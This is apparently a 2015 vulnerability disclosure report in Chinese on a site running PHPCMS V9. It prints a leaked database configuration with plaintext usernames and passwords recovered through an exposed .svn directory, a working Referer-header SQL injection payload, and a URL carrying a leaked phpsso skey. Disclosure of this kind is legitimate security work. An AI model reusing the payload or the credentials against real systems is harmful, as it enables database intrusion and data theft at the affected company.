2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-25: 细节向核心白帽子及相关领域专家公开 2015-09-04: 细节向普通白帽子公开 2015-09-14: 细节向实习白帽子公开 2015-09-29: 细节向公众公开
RT
# 1 :SVN信息泄露 导致 数据库敏感信息泄露http://**.**.**.**/.svn/entrieshttp://**.**.**.**/.svn/entries
/*主表配置*/ 'DB'=>array( 'main'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=sdk_dev', 'masterRead' => false, //从库无效时 从主库读取 'username' => 'sdk_dev', 'password' => 'sdk_dev@2014', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=sdk_dev', 'slavesWrite' => false, 'username' => 'sdk_dev', 'password' => 'sdk_dev@2014', 'charset' => 'utf8', 'tablePrefix' => '', ), ), //其他库 'localhost'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'masterRead' => true, 'username' => 'root', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'slavesWrite' => true, 'username' => 'root', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), ), //251 'test251'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'masterRead' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'slavesWrite' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), ), //251 'cskl251'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=cskl', 'masterRead' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=cskl', 'slavesWrite' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => '', ), ), 'jorgame'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdklog', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdklog', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), ), 'jorgamecom'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdkcom', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdkcom', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), ), 'tianxiangios'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=4302;dbname=andsdk', 'masterRead' => true, 'username' => 'root', 'password' => 'GYqoNsfPBlkAcVczTw', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=4302;dbname=andsdk', 'masterRead' => true, 'username' => 'root', 'password' => 'GYqoNsfPBlkAcVczTw', 'charset' => 'utf8', 'tablePrefix' => '', ), ), ), /*视图配置*/ 'TEMPLATE'=>array( //smarty模板 'smarty' => array( 'TEMPLATE_PATH'=> APP_PATH.'/vendors/smarty/libs/Smarty.class.php', 'CONF_INFO'=>array( 'template_dir' => APP_PATH.'/application/views/default', #模板目录 'compile_dir' => APP_PATH.'/__runtime/script', #编译目录 'cache_dir' => APP_PATH.'/__runtime/html', 'left_delimiter' => '<{', 'right_delimiter' => '}>', 'allow_php_tag' => true, 'caching'=>false, 'cache_lifetime'=>100, ) ), ),
# 2 : PHPCMS V9 的一个referer 注入url:http://**.**.**.**//index.php?m=poster&c=index&a=poster_click&id=1Referer:',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')#
# 3 : 一个skey的泄露http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ乌云有相关的利用文章 我就不演示了http://**.**.**.**/bugs/wooyun-2015-0105242该去吃饭了~~
综上
自查
危害等级:高
漏洞Rank:15
确认时间:2015-08-15 18:08
感谢对我们安全工作的关心!
暂无